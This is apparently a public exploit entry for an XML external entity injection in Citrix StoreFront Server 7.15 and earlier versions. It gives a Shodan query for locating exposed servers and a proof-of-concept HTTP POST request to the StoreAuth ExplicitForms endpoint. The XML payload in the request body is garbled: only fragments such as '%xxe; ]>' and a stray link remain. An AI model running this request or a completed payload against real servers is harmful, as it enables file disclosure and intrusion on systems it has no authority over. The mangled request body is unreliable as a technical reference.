# Exploit Title: Citrix StoreFront Server 7.15 - XML External Entity Injection # Date: 2019-08-28 # Exploit Author: Vahagn Vardanya # Vendor Homepage:https://www.citrix.com/downloads/storefront/ # Software Link: https://support.citrix.com/article/CTX251988 # Version: # Citrix StoreFront Server earlier than 1903 # Citrix StoreFront Server 7.15 LTSR earlier than CU4 (3.12.4000) # Citrix StoreFront Server 7.6 LTSR earlier than CU8 (3.0.8000)# # Tested on: Windows # Shodan query https://www.shodan.io/search?query=%2FCitrix%2FStoreWeb # PoC POST /Citrix/StoreAuth/ExplicitForms/Start HTTP/1.1 Content-Type: application/vnd.citrix.requesttoken+xml Accept: application/vnd.citrix.requesttokenresponse+xml, application/vnd. citrix.authenticateresponse-1+xml Accept-Language:ru,en-US;q=0.9,en;q=0.8,fr;q=0.7,hy;q=0.6,de;q=0.5,es;q=0.4,nb;q=0.3,nl;q=0.2,fi;q=0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36 X-Forwarded-For: 192.168.204.1 X-Citrix-Agent: crm. X-Citrix-AM-CredentialTypes: none, username, domain, password, newpassword,passcode, savecredentials, textcredential, webview, webview X-Citrix-AM-LabelTypes: none, plain, heading, information, warning, error,confirmation, image X-Citrix-IsUsingHTTPS: No Host: 192.168.204.131 Content-Length: 331 Expect: 100-continue %xxe; ]>

http://secure-web.cisco.com/

0.08:00:00